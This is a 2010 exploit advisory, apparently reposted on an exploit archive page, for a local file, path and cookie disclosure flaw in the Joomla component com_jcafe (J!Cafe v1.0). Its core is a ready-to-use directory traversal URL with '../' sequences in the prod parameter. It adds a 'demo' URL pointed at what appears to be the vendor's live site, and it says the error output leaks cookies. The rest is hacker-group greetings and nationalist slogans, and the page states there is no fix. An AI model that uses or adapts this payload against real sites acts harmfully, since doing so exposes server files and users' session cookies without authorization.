Joomla Component com_jcafe Multiple Vulnerabilities

2010-06-29 16:03:57

# Exploit Title: Joomla Component com_jcafe local File/Path and Cookie Disclosure Vulnerability
# Date: 25/06/2010
# Author: r45c4l
# Email: r45c4l[at]hotmail[dot]com
# Site : www.garage4hackers.com
# Vendor url: http://www.joomcafe.com/
# Version: J!Cafe v1.0
# Tested on: Windows
# CVE : ()

:::::::::::::::::::::::::

:::::::::::::::::::::::::

=================Exploit======
---Indian Cyber warriors---


[ EXPL0!T ]

Local File, Path and Cookie Disclosure

p0c - http://www.site.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../

dem0 - http://ver1.5.joomcafe.com/index.php?option=com_jcafe&Itemid=53&task=view&prod=../../../../../../

The error message will also disclose the cookies also.


===========================================================

Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Sandeep, Th3 RDX,

Vaibhav, All members of ICW and Hackers Garage, and all Indian Hackers

Greetz to: Lucky and Atul and team ICA

PROUD TO BE AN INDIAN

c0d3 for motherland, h4ck for motherland

Special Greetz to : www.hack0wn.com www.exploits-db.com www.inj3ct0r.com

=== End () ====

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.